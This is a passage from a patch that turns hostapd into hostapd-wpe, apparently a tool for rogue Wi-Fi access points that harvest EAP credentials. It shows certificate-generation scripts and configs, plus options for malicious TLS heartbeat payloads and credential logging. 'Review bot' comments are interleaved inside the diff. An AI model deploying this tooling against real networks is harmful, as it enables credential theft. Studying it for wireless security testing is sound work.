++ALL=hostapd-wpe hostapd_cli-wpe + CONFIG_FILE = .config + + include ../src/build.rules +@@ -85,6 +85,7 @@ OBJS += ../src/ap/bss_load.o + OBJS += ../src/ap/neighbor_db.o + OBJS += ../src/ap/rrm.o + OBJS += ../src/common/ptksa_cache.o ++OBJS += ../src/wpe/wpe.o + + OBJS_c = hostapd_cli.o + OBJS_c += ../src/common/wpa_ctrl.o +@@ -1303,11 +1304,20 @@ $(DESTDIR)$(BINDIR)/%: % + + install: $(addprefix $(DESTDIR)$(BINDIR)/,$(ALL)) + ++wpe: ++ install -d $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 hostapd-wpe.conf 
hostapd-wpe.eap_user $(DESTDIR)/etc/hostapd-wpe ++ install -d $(DESTDIR)/etc/hostapd-wpe/certs ++ install -d $(DESTDIR)/etc/hostapd-wpe/certs/demoCA ++ install -m 644 certs/demoCA/cacert.pem $(DESTDIR)/etc/hostapd-wpe/certs/demoCA ++ install -m 755 certs/bootstrap $(DESTDIR)/etc/hostapd-wpe/certs ++ install -m 644 certs/ca.cnf certs/client.cnf certs/Makefile certs/README certs/README.wpe certs/server.cnf certs/xpextensions $(DESTDIR)/etc/hostapd-wpe/certs ++ + _OBJS_VAR := OBJS + include ../src/objs.mk + +-hostapd: $(OBJS) +- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS) ++hostapd-wpe: $(OBJS) ++ $(Q)$(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) + @$(E) " LD " $@ + + ifdef CONFIG_WPA_TRACE +@@ -1317,8 +1327,8 @@ endif + _OBJS_VAR := OBJS_c + include ../src/objs.mk + +-hostapd_cli: $(OBJS_c) +- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c) ++hostapd_cli-wpe: $(OBJS_c) ++ $(Q)$(CC) $(LDFLAGS) -o $@ $(OBJS_c) $(LIBS_c) + @$(E) " LD " $@ + + NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/Makefile hostapd-2.11-wpe/hostapd/certs/Makefile +--- hostapd-2.11/hostapd/certs/Makefile 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/Makefile 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,145 @@ ++###################################################################### ++# ++# Make file to be installed in /etc/raddb/certs to enable ++# the easy creation of certificates. ++# ++# See the README file in this directory for more information. ++# ++# $Id: cc12464c6c7754aff2f0c8d6e116708c94ff2168 $ ++# ++###################################################################### ++ ++DH_KEY_SIZE = 2048 ++ ++# ++# Set the passwords ++# ++-include passwords.mk ++ ++###################################################################### ++# ++# Make the necessary files, but not client certificates. 
++# ++###################################################################### ++.PHONY: all ++all: index.txt serial dh server ca client ++ ++.PHONY: client ++client: client.pem ++ ++.PHONY: ca ++ca: ca.der ++ ++.PHONY: server ++server: server.pem server.vrfy ++ ++.PHONY: verify ++verify: server.vrfy client.vrfy ++ ++passwords.mk: server.cnf ca.cnf client.cnf ++ @echo "PASSWORD_SERVER = '$(shell grep output_password server.cnf | sed 's/.*=//;s/^ *//')'" > $@ ++ @echo "PASSWORD_CA = '$(shell grep output_password ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ ++ @echo "PASSWORD_CLIENT = '$(shell grep output_password client.cnf | sed 's/.*=//;s/^ *//')'" >> $@ ++ @echo "USER_NAME = '$(shell grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//')'" >> $@ ++ @echo "CA_DEFAULT_DAYS = '$(shell grep default_days ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ ++ ++###################################################################### ++# ++# Diffie-Hellman parameters ++# ++###################################################################### ++dh: ++ openssl dhparam -out dh -2 $(DH_KEY_SIZE) ++ ++###################################################################### ++# ++# Create a new self-signed CA certificate ++# ++###################################################################### ++ca.key ca.pem: ca.cnf ++ @[ -f index.txt ] || $(MAKE) index.txt ++ @[ -f serial ] || $(MAKE) serial ++ openssl req -new -x509 -keyout ca.key -out ca.pem \ ++ -days $(CA_DEFAULT_DAYS) -config ./ca.cnf ++ ++ca.der: ca.pem ++ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der ++ ++###################################################################### ++# ++# Create a new server certificate, signed by the above CA. 
++# ++###################################################################### ++server.csr server.key: server.cnf ++ openssl req -new -out server.csr -keyout server.key -config ./server.cnf ++ ++server.crt: server.csr ca.key ca.pem ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf ++ ++server.p12: server.crt ++ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) ++ ++server.pem: server.p12 ++ openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) ++ ++.PHONY: server.vrfy ++server.vrfy: ca.pem ++ @openssl verify -CAfile ca.pem server.pem ++ ++###################################################################### ++# ++# Create a new client certificate, signed by the the above server ++# certificate. ++# ++###################################################################### ++client.csr client.key: client.cnf ++ openssl req -new -out client.csr -keyout client.key -config ./client.cnf ++ ++client.crt: client.csr ca.pem ca.key ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf ++ ++client.p12: client.crt ++ openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12 -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) ++ ++client.pem: client.p12 ++ openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) ++ cp client.pem $(USER_NAME).pem ++ ++.PHONY: client.vrfy ++client.vrfy: ca.pem client.pem ++ c_rehash . ++ openssl verify -CApath . client.pem ++ ++###################################################################### ++# ++# Miscellaneous rules. 
++# ++###################################################################### ++index.txt: ++ @touch index.txt ++ ++serial: ++ @echo '01' > serial ++ ++print: ++ openssl x509 -text -in server.crt ++ ++printca: ++ openssl x509 -text -in ca.pem ++ ++install: ++ install -d $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 dh $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 ca.pem $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 server.pem $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 server.key $(DESTDIR)/etc/hostapd-wpe ++ ++clean: ++ @rm -f *~ *old client.csr client.key client.crt client.p12 client.pem ++ ++# ++# Make a target that people won't run too often. ++# ++destroycerts: ++ rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \ ++ serial* *\.0 *\.1 +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/README hostapd-2.11-wpe/hostapd/certs/README +--- hostapd-2.11/hostapd/certs/README 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/README 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,226 @@ ++ This directory contains scripts to create the server certificates. ++To make a set of default (i.e. test) certificates, simply type: ++ ++$ ./bootstrap ++ ++ The "openssl" command will be run against the sample configuration ++files included here, and will make a self-signed certificate authority ++(i.e. root CA), and a server certificate. This "root CA" should be ++installed on any client machine needing to do EAP-TLS, PEAP, or ++EAP-TTLS. ++ ++ The Microsoft "XP Extensions" will be automatically included in the ++server certificate. Without those extensions Windows clients will ++refuse to authenticate to FreeRADIUS. ++ ++ The root CA and the "XP Extensions" file also contain a crlDistributionPoints ++attribute. The latest release of Windows Phone needs this to be present ++for the handset to validate the RADIUS server certificate. 
The RADIUS ++server must have the URI defined but the CA need not have...however it ++is best practice for a CA to have a revocation URI. Note that whilst ++the Windows Mobile client cannot actually use the CRL when doing 802.1X ++it is recommended that the URI be an actual working URL and contain a ++revocation format file as there may be other OS behaviour at play and ++future OSes that may do something with that URI. ++ ++ In general, you should use self-signed certificates for 802.1x (EAP) ++authentication. When you list root CAs from other organisations in ++the "ca_file", you permit them to masquerade as you, to authenticate ++your users, and to issue client certificates for EAP-TLS. ++ ++ If FreeRADIUS was configured to use OpenSSL, then simply starting ++the server in root in debugging mode should also create test ++certificates, i.e.: ++ ++$ radiusd -X ++ ++ That will cause the EAP-TLS module to run the "bootstrap" script in ++this directory. The script will be executed only once, the first time ++the server has been installed on a particular machine. This bootstrap ++script SHOULD be run on installation of any pre-built binary package ++for your OS. In any case, the script will ensure that it is not run ++twice, and that it does not over-write any existing certificates. ++ ++ If you already have CA and server certificates, rename (or delete) ++this directory, and create a new "certs" directory containing your ++certificates. Note that the "make install" command will NOT ++over-write your existing "raddb/certs" directory, which means that the ++"bootstrap" command will not be run. ++ ++ ++ NEW INSTALLATIONS OF FREERADIUS ++ ++ ++ We suggest that new installations use the test certificates for ++initial tests, and then create real certificates to use for normal ++user authentication. See the instructions below for how to create the ++various certificates. 
The old test certificates can be deleted by ++running the following command: ++ ++$ rm -f *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt* ++ ++ Then, follow the instructions below for creating real certificates. ++ ++ Once the final certificates have been created, you can delete the ++"bootstrap" command from this directory, and delete the ++"make_cert_command" configuration from the "tls" sub-section of ++eap.conf. ++ ++ If you do not want to enable EAP-TLS, PEAP, or EAP-TTLS, then delete ++the relevant sub-sections from the "eap.conf" file. ++ ++ ++ MAKING A ROOT CERTIFICATE ++ ++ ++$ vi ca.cnf ++ ++ Edit the "input_password" and "output_password" fields to be the ++ password for the CA certificate. ++ ++ Edit the [certificate_authority] section to have the correct values ++ for your country, state, etc. ++ ++$ make ca.pem ++ ++ This step creates the CA certificate. ++ ++$ make ca.der ++ ++ This step creates the DER format of the self-signed certificate, ++ which is can be imported into Windows. ++ ++ ++ MAKING A SERVER CERTIFICATE ++ ++ ++$ vi server.cnf ++ ++ Edit the "input_password" and "output_password" fields to be the ++ password for the server certificate. ++ ++ Edit the [server] section to have the correct values for your ++ country, state, etc. Be sure that the commonName field here is ++ different from the commonName for the CA certificate. ++ ++$ make server.pem ++ ++ This step creates the server certificate. ++ ++ If you have an existing certificate authority, and wish to create a ++ certificate signing request for the server certificate, edit ++ server.cnf as above, and type the following command. ++ ++$ make server.csr ++ ++ You will have to ensure that the certificate contains the XP ++ extensions needed by Microsoft clients. ++ ++ ++ MAKING A CLIENT CERTIFICATE ++ ++ ++ Client certificates are used by EAP-TLS, and optionally by EAP-TTLS ++and PEAP. 
The following steps outline how to create a client ++certificate that is signed by the server certificate created above. ++You will have to have the password for the server certificate in the ++"input_password" and "output_password" fields of the server.cnf file. ++ ++ ++$ vi client.cnf ++ ++ Edit the "input_password" and "output_password" fields to be the ++ password for the client certificate. You will have to give these ++ passwords to the end user who will be using the certificates. ++ ++ Edit the [client] section to have the correct values for your ++ country, state, etc. Be sure that the commonName field here is ++ the User-Name that will be used for logins! ++ ++$ make client.pem ++ ++ The users certificate will be in "emailAddress.pem", ++ i.e. "user@example.com.pem". ++ ++ To create another client certificate, just repeat the steps for ++ making a client certificate, being sure to enter a different login ++ name for "commonName", and a different password. ++ ++ ++ PERFORMANCE ++ ++ ++ EAP performance for EAP-TLS, TTLS, and PEAP is dominated by SSL ++ calculations. That is, a normal system can handle PAP ++ authentication at a rate of 10k packets/s. However, SSL involves ++ RSA calculations, which are very expensive. To benchmark your system, ++ do: ++ ++$ openssl speed rsa ++ ++ or ++ ++$ openssl speed rsa2048 ++ ++ to test 2048 bit keys. ++ ++ A 1GHz system will likely do 30 calculations/s. A 2GHz system may ++ do 50 calculations/s, or more. That number is also the number of ++ authentications/s that can be done for EAP-TLS (or TTLS, or PEAP). ++ ++ ++ COMPATIBILITY ++ ++The certificates created using this method are known to be compatible ++with ALL operating systems. Some common issues are: ++ ++ - Windows requires certain OIDs in the certificates. If it doesn't ++ see them, it will stop doing EAP. The most visible effect is ++ that the client starts EAP, gets a few Access-Challenge packets, ++ and then a little while later re-starts EAP. 
If this happens, see ++ the FAQ, and the comments in raddb/eap.conf for how to fix it. ++ ++ - Windows requires the root certificates to be on the client PC. ++ If it doesn't have them, you will see the same issue as above. ++ ++ - Windows XP post SP2 has a bug where it has problems with ++ certificate chains. i.e. if the server certificate is an ++ intermediate one, and not a root one, then authentication will ++ silently fail, as above. ++ ++ - Some versions of Windows CE cannot handle 4K RSA certificates. ++ They will (again) silently fail, as above. ++ ++ - In none of these cases will Windows give the end user any ++ reasonable error message describing what went wrong. This leads ++ people to blame the RADIUS server. That blame is misplaced. ++ ++ - Certificate chains of more than 64K bytes are known to not work. ++ This is a problem in FreeRADIUS. However, most clients cannot ++ handle 64K certificate chains. Most Access Points will shut down ++ the EAP session after about 50 round trips, while 64K certificate ++ chains will take about 60 round trips. So don't use large ++ certificate chains. They will only work after everyone upgrade ++ everything in the network. ++ ++ - All other operating systems are known to work with EAP and ++ FreeRADIUS. This includes Linux, *BSD, Mac OS X, Solaris, ++ Symbian, along with all known embedded systems, phones, WiFi ++ devices, etc. ++ ++ - Someone needs to ask Microsoft to please stop making life hard for ++ their customers. ++ ++ ++ SECURITY CONSIDERATIONS ++ ++The default certificate configuration files uses MD5 for message ++digests, to maintain compatibility with network equipment that ++supports only this algorithm. ++ ++MD5 has known weaknesses and is discouraged in favour of SHA1 (see ++http://www.kb.cert.org/vuls/id/836068 for details). 
If your network ++equipment supports the SHA1 signature algorithm, we recommend that you ++change the "ca.cnf", "server.cnf", and "client.cnf" files to specify ++the use of SHA1 for the certificates. To do this, change the ++'default_md' entry in those files from 'md5' to 'sha1'. +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/README.wpe hostapd-2.11-wpe/hostapd/certs/README.wpe +--- hostapd-2.11/hostapd/certs/README.wpe 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/README.wpe 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,13 @@ ++# Certificate creation for Hostapd-WPE # ++######################################## ++ ++Usage: ++ ++make clean ++./bootstrap ++make install ++ ++Notes: ++- Windows 10 (and possibly any Windows starting from Vista) will fail EAP ++ if certificates signed with MD5 are used. ++- Generated certificates used a SHA256 signature. +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/bootstrap hostapd-2.11-wpe/hostapd/certs/bootstrap +--- hostapd-2.11/hostapd/certs/bootstrap 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/bootstrap 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,82 @@ ++#!/bin/sh ++# ++# This is a wrapper script to create default certificates when the ++# server first starts in debugging mode. Once the certificates have been ++# created, this file should be deleted. ++# ++# Ideally, this program should be run as part of the installation of any ++# binary package. The installation should also ensure that the permissions ++# and owners are correct for the files generated by this script. ++# ++# $Id: c9d939beac8d5bdc21ea1ff9233442f9ab933297 $ ++# ++umask 027 ++cd `dirname $0` ++ ++make -h > /dev/null 2>&1 ++ ++# ++# If we have a working "make", then use it. Otherwise, run the commands ++# manually. ++# ++if [ "$?" = "0" ]; then ++ make all ++ exit $? 
++fi ++ ++# ++# The following commands were created by running "make -n", and edited ++# to remove the trailing backslash, and to add "exit 1" after the commands. ++# ++# Don't edit the following text. Instead, edit the Makefile, and ++# re-generate these commands. ++# ++if [ ! -f dh ]; then ++ openssl dhparam -out dh 1024 || exit 1 ++ if [ -e /dev/urandom ] ; then ++ ln -sf /dev/urandom random ++ else ++ date > ./random; ++ fi ++fi ++ ++if [ ! -f server.key ]; then ++ openssl req -new -out server.csr -keyout server.key -config ./server.cnf || exit 1 ++fi ++ ++if [ ! -f ca.key ]; then ++ openssl req -new -x509 -keyout ca.key -out ca.pem -days `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` -config ./ca.cnf || exit 1 ++fi ++ ++if [ ! -f index.txt ]; then ++ touch index.txt ++fi ++ ++if [ ! -f serial ]; then ++ echo '01' > serial ++fi ++ ++if [ ! -f server.crt ]; then ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf || exit 1 ++fi ++ ++if [ ! -f server.p12 ]; then ++ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 ++fi ++ ++if [ ! -f server.pem ]; then ++ openssl pkcs12 -in server.p12 -out server.pem -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 ++ openssl verify -CAfile ca.pem server.pem || exit 1 ++fi ++ ++if [ ! -f ca.der ]; then ++ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der || exit 1 ++fi ++ ++if [ ! -f client.key ]; then ++ openssl req -new -out client.csr -keyout client.key -config ./client.cnf ++fi ++ ++if [ ! 
-f client.crt ]; then ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf ++fi +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/ca.cnf hostapd-2.11-wpe/hostapd/certs/ca.cnf +--- hostapd-2.11/hostapd/certs/ca.cnf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/ca.cnf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,62 @@ ++[ ca ] ++default_ca = CA_default ++ ++[ CA_default ] ++dir = ./ ++certs = $dir ++crl_dir = $dir/crl ++database = $dir/index.txt ++new_certs_dir = $dir ++certificate = $dir/ca.pem ++serial = $dir/serial ++crl = $dir/crl.pem ++private_key = $dir/ca.key ++RANDFILE = $dir/.rand ++name_opt = ca_default ++cert_opt = ca_default ++default_days = 365 ++default_crl_days = 364 ++default_md = sha256 ++preserve = no ++policy = policy_match ++crlDistributionPoints = URI:http://www.example.org/example_ca.crl ++ ++[ policy_match ] ++countryName = match ++stateOrProvinceName = match ++organizationName = match ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ policy_anything ] ++countryName = optional ++stateOrProvinceName = optional ++localityName = optional ++organizationName = optional ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ req ] ++prompt = no ++distinguished_name = certificate_authority ++default_bits = 2048 ++input_password = whatever ++output_password = whatever ++x509_extensions = v3_ca ++ ++[certificate_authority] ++countryName = FR ++stateOrProvinceName = Radius ++localityName = Somewhere ++organizationName = Example Inc. 
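Review bot: The fallback path hard-codes `openssl dhparam -out dh 1024` while the Makefile's `dh` rule uses `$(DH_KEY_SIZE)`, so a host without a working make silently gets 1024-bit DH parameters regardless of what the package configures; the two paths should agree, e.g. `openssl dhparam -out dh 2048 || exit 1` using the same value the Makefile resolves. The last two steps (the `openssl req ... -config ./client.cnf` and `openssl ca ... -config ./client.cnf` commands) are the only ones without `|| exit 1`, so a failed client certificate leaves the script exiting 0 with partial output. The `cd` into the script's directory uses an unquoted backtick expansion; `cd "$(dirname "$0")"` survives paths with spaces. The header comment says these commands were produced from `make -n`, which suggests regenerating them from the Makefile rather than patching them by hand so the two stay in step.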
++emailAddress = admin@example.org ++commonName = "Example Certificate Authority" ++ ++[v3_ca] ++subjectKeyIdentifier = hash ++authorityKeyIdentifier = keyid:always,issuer:always ++basicConstraints = critical,CA:true ++crlDistributionPoints = URI:http://www.example.org/example_ca.crl ++ +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/client.cnf hostapd-2.11-wpe/hostapd/certs/client.cnf +--- hostapd-2.11/hostapd/certs/client.cnf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/client.cnf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,53 @@ ++[ ca ] ++default_ca = CA_default ++ ++[ CA_default ] ++dir = ./ ++certs = $dir ++crl_dir = $dir/crl ++database = $dir/index.txt ++new_certs_dir = $dir ++certificate = $dir/ca.pem ++serial = $dir/serial ++crl = $dir/crl.pem ++private_key = $dir/ca.key ++RANDFILE = $dir/.rand ++name_opt = ca_default ++cert_opt = ca_default ++default_days = 365 ++default_crl_days = 364 ++default_md = sha256 ++preserve = no ++policy = policy_match ++ ++[ policy_match ] ++countryName = match ++stateOrProvinceName = match ++organizationName = match ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ policy_anything ] ++countryName = optional ++stateOrProvinceName = optional ++localityName = optional ++organizationName = optional ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ req ] ++prompt = no ++distinguished_name = client ++default_bits = 2048 ++input_password = whatever ++output_password = whatever ++ ++[client] ++countryName = FR ++stateOrProvinceName = Radius ++localityName = Somewhere ++organizationName = Example Inc. 
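Review bot: `crlDistributionPoints` here points at `http://www.example.org/example_ca.crl` (in both `[ CA_default ]` and `[v3_ca]`), while `xpserver_ext`/`xpclient_ext` in xpextensions use `http://www.example.com/example_ca.crl`, so the CA and the certificates it issues advertise different CRL locations; the README added in the same patch asks for the URI to be a working one, so the two files should at least agree on a single placeholder. The README's SECURITY CONSIDERATIONS section also still states that the configuration files default to MD5, which contradicts `default_md = sha256` here and the note in README.wpe; that stale paragraph should be removed or reworded. `input_password`/`output_password = whatever` must stay in step with `private_key_passwd=whatever` in hostapd-wpe.conf, so a comment on the `[ req ]` section such as `# must match private_key_passwd in hostapd-wpe.conf` would save a round trip for anyone who changes one but not the other.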
++emailAddress = user@example.org ++commonName = user@example.org +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/demoCA/cacert.pem hostapd-2.11-wpe/hostapd/certs/demoCA/cacert.pem +--- hostapd-2.11/hostapd/certs/demoCA/cacert.pem 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/demoCA/cacert.pem 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,22 @@ ++-----BEGIN CERTIFICATE----- ++MIIDtjCCAx+gAwIBAgIBADANBgkqhkiG9w0BAQQFADCBnzELMAkGA1UEBhMCQ0Ex ++ETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQHEwlTb21lIENpdHkxFTATBgNVBAoT ++DE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9jYWxob3N0MRswGQYDVQQDExJDbGll ++bnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0BCQEWEmNsaWVudEBleGFtcGxlLmNv ++bTAeFw0wNDAxMjUxMzI2MDdaFw0wNjAxMjQxMzI2MDdaMIGfMQswCQYDVQQGEwJD ++QTERMA8GA1UECBMIUHJvdmluY2UxEjAQBgNVBAcTCVNvbWUgQ2l0eTEVMBMGA1UE ++ChMMT3JnYW5pemF0aW9uMRIwEAYDVQQLEwlsb2NhbGhvc3QxGzAZBgNVBAMTEkNs ++aWVudCBjZXJ0aWZpY2F0ZTEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGV4YW1wbGUu ++Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUxbGXJPFkrPH/sYnbHI+/ ++9PFDlup8sekPeNaUUXJTd4ld/lLMuZtB6A3etYsSepQ/T1jLxWKHgZL73G/s6fhx ++58Ew01z1GIgX6bEzJJ7dKhx10xBDrodVPOx6d+8mqn10KB25t34XxkRsXdmxiLQy ++UMoCKZY3IqEjpyawC0An/QIDAQABo4H/MIH8MB0GA1UdDgQWBBRo020+Hue8nVoF ++cCHDY9oTZdGt4zCBzAYDVR0jBIHEMIHBgBRo020+Hue8nVoFcCHDY9oTZdGt46GB ++paSBojCBnzELMAkGA1UEBhMCQ0ExETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQH ++EwlTb21lIENpdHkxFTATBgNVBAoTDE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9j ++YWxob3N0MRswGQYDVQQDExJDbGllbnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0B ++CQEWEmNsaWVudEBleGFtcGxlLmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3 ++DQEBBAUAA4GBADPAC2ax5Xnvc6BnmCUtq41eVRH8AP0nbYDRL4NHd8Z0P9wnQ/yh ++UHcE5LwJeeT2CsOtnug+bzRzaSKdH3cim6LpgjWdpWMCSgAWPbptbJhsC60or4UT ++L/jw12UBvxt8Lf9ljOHmLAGZe25k4+jUNzNUzpkShHZRU5BjuFu8VIXF ++-----END CERTIFICATE----- +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/server.cnf hostapd-2.11-wpe/hostapd/certs/server.cnf +--- hostapd-2.11/hostapd/certs/server.cnf 1970-01-01 00:00:00.000000000 +0000 ++++ 
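Review bot: demoCA/cacert.pem is not referenced by the Makefile, bootstrap, or any of the `.cnf` files added here (`[ CA_default ]` uses `dir = ./` and `certificate = $dir/ca.pem`), so it looks like a stray artefact rather than part of the generation flow. If I read the DER correctly, the blob is a self-signed 1024-bit RSA certificate using md5WithRSAEncryption, valid 2004-01-25 to 2006-01-24, with subject CN "Client certificate"; shipping an expired, weakly signed test certificate alongside the real CA material invites confusion about which trust anchor is actually in use. Dropping the file, or stating in README.wpe why it is kept, would be cleaner.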
hostapd-2.11-wpe/hostapd/certs/server.cnf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,54 @@ ++[ ca ] ++default_ca = CA_default ++ ++[ CA_default ] ++dir = ./ ++certs = $dir ++crl_dir = $dir/crl ++database = $dir/index.txt ++new_certs_dir = $dir ++certificate = $dir/server.pem ++serial = $dir/serial ++crl = $dir/crl.pem ++private_key = $dir/server.key ++RANDFILE = $dir/.rand ++name_opt = ca_default ++cert_opt = ca_default ++default_days = 60 ++default_crl_days = 30 ++default_md = sha256 ++preserve = no ++policy = policy_match ++ ++[ policy_match ] ++countryName = match ++stateOrProvinceName = match ++organizationName = match ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ policy_anything ] ++countryName = optional ++stateOrProvinceName = optional ++localityName = optional ++organizationName = optional ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ req ] ++prompt = no ++distinguished_name = server ++default_bits = 2048 ++input_password = whatever ++output_password = whatever ++ ++[server] ++countryName = FR ++stateOrProvinceName = Radius ++localityName = Somewhere ++organizationName = Example Inc. ++emailAddress = admin@example.org ++commonName = "Example Server Certificate" ++ +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/xpextensions hostapd-2.11-wpe/hostapd/certs/xpextensions +--- hostapd-2.11/hostapd/certs/xpextensions 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/xpextensions 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,24 @@ ++# ++# File containing the OIDs required for Windows. 
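Review bot: `[ CA_default ]` in server.cnf names `$dir/server.pem` and `$dir/server.key` as the CA certificate and private key, but the Makefile's `server.crt` and `client.crt` rules pass `-keyfile ca.key -cert ca.pem` explicitly, so these two entries are dead configuration that suggests the server certificate signs other certificates when it does not; either drop them or add `# overridden by -keyfile/-cert in the Makefile` so the next reader is not misled. `default_days = 60` gives the server certificate a lifetime one sixth of the CA's 365, and the install target copies server.pem into /etc/hostapd-wpe with nothing that renews it; if the short lifetime is intentional it deserves a comment, otherwise aligning it with ca.cnf avoids a certificate that expires two months after installation.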
++# ++# http://support.microsoft.com/kb/814394/en-us ++# ++[ xpclient_ext] ++extendedKeyUsage = 1.3.6.1.5.5.7.3.2 ++crlDistributionPoints = URI:http://www.example.com/example_ca.crl ++ ++[ xpserver_ext] ++extendedKeyUsage = 1.3.6.1.5.5.7.3.1 ++crlDistributionPoints = URI:http://www.example.com/example_ca.crl ++ ++# ++# Add this to the PKCS#7 keybag attributes holding the client's private key ++# for machine authentication. ++# ++# the presence of this OID tells Windows XP that the cert is intended ++# for use by the computer itself, and not by an end-user. ++# ++# The other solution is to use Microsoft's web certificate server ++# to generate these certs. ++# ++# 1.3.6.1.4.1.311.17.2 +diff '--color=auto' -rupN hostapd-2.11/hostapd/config_file.c hostapd-2.11-wpe/hostapd/config_file.c +--- hostapd-2.11/hostapd/config_file.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/config_file.c 2024-07-26 09:11:33.200000000 +0000 +@@ -24,7 +24,7 @@ + #include "ap/wpa_auth.h" + #include "ap/ap_config.h" + #include "config_file.h" +- ++#include "wpe/wpe.h" + + #ifndef CONFIG_NO_VLAN + static int hostapd_config_read_vlan_file(struct hostapd_bss_config *bss, +@@ -2606,6 +2606,22 @@ static int hostapd_config_fill(struct ho + } + bss->eapol_version = eapol_version; + wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version); ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ } else if (os_strcmp(buf, "wpe_logfile") == 0) { ++ wpe_conf.wpe_logfile = os_strdup(pos); ++ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) { ++ wpe_conf.wpe_hb_send_before_handshake = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) { ++ wpe_conf.wpe_hb_send_before_appdata = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) { ++ wpe_conf.wpe_hb_send_after_appdata = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) { ++ wpe_conf.wpe_hb_payload_size = atoi(pos); ++ } else if 